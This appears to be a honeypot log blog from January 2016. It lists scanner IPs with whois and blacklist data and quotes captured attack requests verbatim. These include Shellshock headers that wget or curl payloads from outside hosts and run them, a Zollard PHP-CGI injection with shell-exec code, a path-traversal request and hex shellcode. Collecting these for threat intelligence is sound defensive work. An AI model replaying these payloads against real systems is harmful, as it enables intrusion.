Sonntag, 24. Januar 2016

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)

BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
 For more information https://user-agents.me/crawler/whatweb048-dev
According to some news in the web, this crawler is meant to identify the running webpages on a server.

61.49.45[.]47

    Whois Data (TeamCymru)
  • AS : 4808
  • IP : 61.49.45.47
  • BGP Prefix : 61.49.0.0/18
  • CC : CN
  • Registry : apnic
  • Allocated : 2001-06-28
  • AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/61.49.45.47

Donnerstag, 21. Januar 2016

213.136.72.84 . Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


 END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

92.45.197.218 - Zollard php execution

BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disabl

END OF DATA
Sadly the request was to long to be fully logged by the fake HTTP server

The POST messages is
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1

92.45.197[.]218

    Whois Data (TeamCymru)
  • AS : 34984
  • IP : 92.45.197.218
  • BGP Prefix : 92.45.196.0/23
  • CC : TR
  • Registry : ripencc
  • Allocated : 2007-12-17
  • AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

 

Mittwoch, 13. Januar 2016

Scanner seen on January 14, 2016

  • 185.130.5.207 - muieblackcat
  • 37.142.32.222 - masscan/1.0
  • 149.78.19.136 -  masscan/1.0
  • 195.169.125.87 -  zgrab/0.x 
  • 185.130.5.235 -  muieblackcat

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

37.142.32[.]222

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 37.142.32.222
  • BGP Prefix : 37.142.32.0/22
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-02-29
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/37.142.32.222

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 46.172.71.251, 195.169.125.87 - to ping 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2016/01/4617271251-19516912587-to-ping.html
  • In db since: 2016-01-09 11:54:24.541062

185.130.5[.]235

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.235
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.235
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.235
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

83.54.165.57 - Shellshock wget via http://192.192.78.216:9090

BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh  && /bin/sh /tmp/S0.sh 0<&1 2>&1

83.54.165[.]57

    Whois Data (TeamCymru)
  • AS : 3352
  • IP : 83.54.165.57
  • BGP Prefix : 83.54.0.0/16
  • CC : ES
  • Registry : ripencc
  • Allocated : 2004-10-07
  • AS Name: TELEFONICA_DE_ESPANA TELEFONICA DE ESPANA,ES
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/83.54.165.57

192.192.78[.]216

    Whois Data (TeamCymru)
  • AS : 1659
  • IP : 192.192.78.216
  • BGP Prefix : 192.192.0.0/16
  • CC : TW
  • Registry : apnic
  • Allocated :
  • AS Name: ERX-TANET-ASN1 Taiwan Academic Network (TANet) Information Center,TW
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois



 

Dienstag, 12. Januar 2016

Scanner seen on January 11,12 2016

  • 208.100.26.231 - Nmap Scripting Engine
  • 141.212.122.81 -  zgrab/0.x
  • 141.212.122.145 -  zgrab/0.x

208.100.26[.]231

    Whois Data (TeamCymru)
  • AS : 32748
  • IP : 208.100.26.231
  • BGP Prefix : 208.100.0.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2006-02-17
  • AS Name: STEADFAST - Steadfast Networks,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 208.100.26.231 - mongodb scanning ip
  • Reference: http://sendmespamids.blogspot.com/2015/10/20810026231-mongodb-scanning-ip.html
  • In db since: 2015-10-11 10:10:48.742000

141.212.122[.]81

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.81
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.81

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Samstag, 9. Januar 2016

85.73.42.84 - wget via http://lliillii.altervista.org/io.php

BEGIN OF HTTP DATA:
2016-01-08 10:07:22
Source IP: 85.73.42.84
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

85.73.42[.]84

    Whois Data (TeamCymru)
  • AS : 6799
  • IP : 85.73.42.84
  • BGP Prefix : 85.73.0.0/16
  • CC : GR
  • Registry : ripencc
  • Allocated : 2006-05-17
  • AS Name: OTENET-GR Ote SA (Hellenic Telecommunications Organisation),GR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 9, 2016

  • 93.174.93.203 - masscan/1.0
  • 141.212.122.145 - zgrab/0.x
  • 69.30.217.226 - muieblackcat

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.145
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

69.30.217[.]226

    Whois Data (TeamCymru)
  • AS : 32097
  • IP : 69.30.217.226
  • BGP Prefix : 69.30.192.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2004-03-16
  • AS Name: WII-KC - WholeSale Internet, Inc.,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.30.217.226

Donnerstag, 7. Januar 2016

84.246.228.80 - access cnf/db.php

BEGIN OF HTTP DATA:
2016-01-07 21:11:32
Source IP: 84.246.228.80
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


84.246.228[.]80

    Whois Data (TeamCymru)
  • AS : 34274
  • IP : 84.246.228.80
  • BGP Prefix : 84.246.224.0/21
  • CC : FR
  • Registry : ripencc
  • Allocated : 2004-10-25
  • AS Name: ELBMULTIMEDIA ELB MULTIMEDIA,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 8, 2016

  • 185.130.5.207 - muieblackcat
  • 141.212.122.64 - zgrab/0.x
  • 5.28.172.193 - masscan/1.0

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]64

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.64
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.64
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.64
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

5.28.172[.]193

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.172.193
  • BGP Prefix : 5.28.160.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.172.193

Mittwoch, 6. Januar 2016

Scanner seen on January, 7 2016

  • 149.78.19.136 - masscan/1.0
  • 213.57.67.192 - masscan/1.0
  • 94.102.48.195 - masscan/1.0
  • 195.169.125.87 - zgrab/0.x
  • 85.25.217.27 -  muieblackcat

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136

213.57.67[.]192

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 213.57.67.192
  • BGP Prefix : 213.57.67.0/24
  • CC : IL
  • Registry : ripencc
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

94.102.48[.]195

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 94.102.48.195
  • BGP Prefix : 94.102.48.0/20
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-08-29
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/94.102.48.195
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/94.102.48.195
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

85.25.217[.]27

    Whois Data (TeamCymru)
  • AS : 8972
  • IP : 85.25.217.27
  • BGP Prefix : 85.25.217.0/24
  • CC : DE
  • Registry : ripencc
  • Allocated : 2005-12-05
  • AS Name: PLUSSERVER-AS PlusServer AG,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/85.25.217.27
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/85.25.217.27

Dienstag, 5. Januar 2016

46.172.71.251, 195.169.125.87 - to ping 212.47.238.143

BEGIN OF HTTP DATA:
2016-01-05 21:01:11
Source IP: 46.172.71.251 (2nd: 195.169.125.87)
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close


 END OF DATA

212.47.238[.]143

    Whois Data (TeamCymru)
  • AS : 12876
  • IP : 212.47.238.143
  • BGP Prefix : 212.47.224.0/19
  • CC : FR
  • Registry : ripencc
  • Allocated :
  • AS Name: AS12876 ONLINE S.A.S.,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 185.93.185.47 - shellsock ping to 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2015/10/1859318547-shellsock-ping-to-21247238143.html
  • In db since: 2015-11-05 09:22:48.499000

46.172.71[.]251

    Whois Data (TeamCymru)
  • AS : 43110
  • IP : 46.172.71.251
  • BGP Prefix : 46.172.64.0/19
  • CC : UA
  • Registry : ripencc
  • Allocated : 2010-12-06
  • AS Name: ROSTNET-AS Joint Ukrainian-American enterprise Ewropol with legal form Ltd,UA
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 46.172.71.251 - simple bash injection
  • Reference: http://sendmespamids.blogspot.com/2015/09/4617271251-simple-bash-injection.html
  • In db since: 2015-09-24 08:17:16.658000

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

Montag, 4. Januar 2016

Scanner seen on January 05, 2016

  • 118.98.104[.]21 - Morfeus Fucking Scanner
  • 89.248.168[.]139 - masscan/1.0
  • 5.28.182[.]161 - masscan/1.0
  • 93.174.93[.]203 - masscan/1.0

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

89.248.168[.]139

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 89.248.168.139
  • BGP Prefix : 89.248.168.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated : 2006-07-11
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/89.248.168.139
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/89.248.168.139

5.28.182[.]161

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.182.161
  • BGP Prefix : 5.28.176.0/21
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/5.28.182.161
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.182.161
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203

118.98.104.21 - Morfeus Fucking Scanner

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

77.126.12.73 - masscan/1.0

77.126.12[.]73

    Whois Data (TeamCymru)
  • AS : 9116
  • IP : 77.126.12.73
  • BGP Prefix : 77.126.0.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2006-11-07
  • AS Name: GOLDENLINES-ASN 012 Smile Communications Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/77.126.12.73
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/77.126.12.73

Freitag, 1. Januar 2016

185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]

BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/&#736%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*

31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80

 END OF DATA

185.130.5[.]224

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.224
  • BGP Prefix : 185.130.5.0/24
  • CC : LThttps://www.blogger.com/blogger.g?blogID=7778406999173736079#editor/target=post;postID=5908088170526748213
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
